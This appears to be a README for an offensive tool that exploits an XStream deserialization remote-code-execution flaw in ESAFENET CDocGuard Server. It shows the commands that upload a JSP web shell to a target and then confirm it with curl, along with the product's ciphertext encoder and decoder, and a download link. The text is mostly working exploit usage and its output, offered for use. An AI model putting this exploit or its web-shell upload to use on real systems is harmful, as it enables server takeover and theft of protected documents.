0x01 Tool Introduction
0x02 Installation and Usage
$ cat test1.jsp
<%
out.println("e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43");
%>
$ java -jar CDGXStreamDeserRCE.jar -p http://127.0.0.1:8080 -uf test1.jsp -t https://192.168.31.190:8443
[ ] Exploit Successed
[ ] WebShell: https://192.168.31.190:8443/CDGServer3/test1.jsp
$ curl -k https://192.168.31.190:8443/CDGServer3/test1.jsp
e165421110ba030e165421110ba03099a1c0393373c5b4399a1c0393373c5b43
2. Ciphertext decoding: read a file's contents and decode them, or decode a string directly.
$ java -jar CDGXStreamDeserRCE.jar -d e.txt
<CDGAuthoriseTemplet>
<authoriseTempletList>
<AuthoriseTemplet>
<name>SystemAdmin</name>
<description>3FF8A0978
....
$ java -jar CDGXStreamDeserRCE.jar -d FEPCCCLCENHIPOAFPAPDDFCGEAPNMDBMOJPMJAKKNPHOKIKIDCBPHEGKLDGNHCBDEIMODEKMKPFBAIMMNLOJJKMIICLAPJAAFGNGAKFBMPKPJMOIKODEJJMHJCCHKBMFMMFDLOMDPABOJCEAPOFDCPMKGDHFNBBIMCIPAMMIIANFPAJHFAABLLLANNIDAGNKOHONJGFGBKHFDMCLJIMICBHBJEIAAIMACN
<SystemReturn>
<returnMessage>Error1200</returnMessage>
</SystemReturn>
3. Plaintext encoding: read a file's contents and encode them, or encode a string directly.
$ java -jar CDGXStreamDeserRCE.jar -e payload.xml
$ java -jar CDGXStreamDeserRCE.jar -e "C:\Program Files (x86)\ESAFENET\CDocGuard Server\tomcat64\webapps\CDGServer3"
BCBILAKIDOOOCGKJDBBFOCGJFGFJPNJALCHEBLGLBFAMKDDLPBCFFJCJHOPGLEACMIOHIFJAGCBPOMIKLMGBAGCNBGEGNKGALLCGLOJNJBHCLMNNGHHJJNAAKPMEDFJDGCEMDADGDCEFFCGEGNFLGHCH
0x03 Download Link
https://github.com/0xf4n9x/CDGXStreamDeserRCE